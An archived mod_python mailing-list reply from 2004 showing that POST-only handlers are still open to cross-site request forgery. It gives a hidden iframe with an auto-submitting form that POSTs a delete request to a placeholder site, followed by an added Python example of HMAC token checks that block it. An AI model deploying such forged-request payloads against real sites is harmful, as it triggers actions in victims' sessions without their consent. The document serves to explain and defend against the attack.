[mod_python] Questions on _call_ with mp servlets and python

mike bayer mike_mp at zzzcomputing.com
Fri Sep 3 17:26:39 EDT 2004


> On Friday 03 September 2004 20:35, David Fraser wrote:
>
>
> If you don't use the query string parameters when you are expecting POST
> variables, then your users are not susceptible to this form of attack.


sadly, not true:

<IFRAME width="0" height="0" src="myattack.html"></IFRAME>

myattack.html:

<body onload = "myform.submit()">
<form name="myform" method="POST" action="http://www.example.com/script">
<input type="hidden" name="deletesomething" value="true">
</form>
</body>
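
A server-side check that rejects the cross-site POST shown above, as an added example that is not part of the original message and not mod_python code. It assumes each session has an identifier the attacking page cannot read; the field name `csrf_token` and the functions `issue_token` and `is_request_allowed` are hypothetical.

```python
import hashlib
import hmac
import secrets

# Constructed per-process secret; a real deployment loads it from protected config.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str) -> str:
    """Token the site embeds as a hidden field in the forms it renders itself."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def is_request_allowed(method: str, session_id: str, form: dict) -> bool:
    """Accept a state-changing request only if it carries this session's token."""
    if method != "POST":
        return False  # state changes are never accepted over GET
    supplied = form.get("csrf_token", "")
    if not isinstance(supplied, str):
        return False
    expected = issue_token(session_id)
    # Constant-time comparison so the check does not leak token bytes via timing.
    return hmac.compare_digest(supplied.encode(), expected.encode())


def demo():
    """Run the check over three constructed requests for the same session."""
    session_id = "constructed-session-id"
    # What the hidden auto-submitting form sends: the browser attaches the
    # session cookie, but the foreign page cannot know the token.
    forged = {"deletesomething": "true"}
    # What the site's own form sends.
    genuine = {"deletesomething": "true", "csrf_token": issue_token(session_id)}
    # A token issued for a different session must not be accepted either.
    replayed = {"deletesomething": "true",
                "csrf_token": issue_token("another-constructed-session")}
    return (
        is_request_allowed("POST", session_id, forged),
        is_request_allowed("POST", session_id, genuine),
        is_request_allowed("POST", session_id, replayed),
    )


if __name__ == "__main__":
    print(demo())
```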

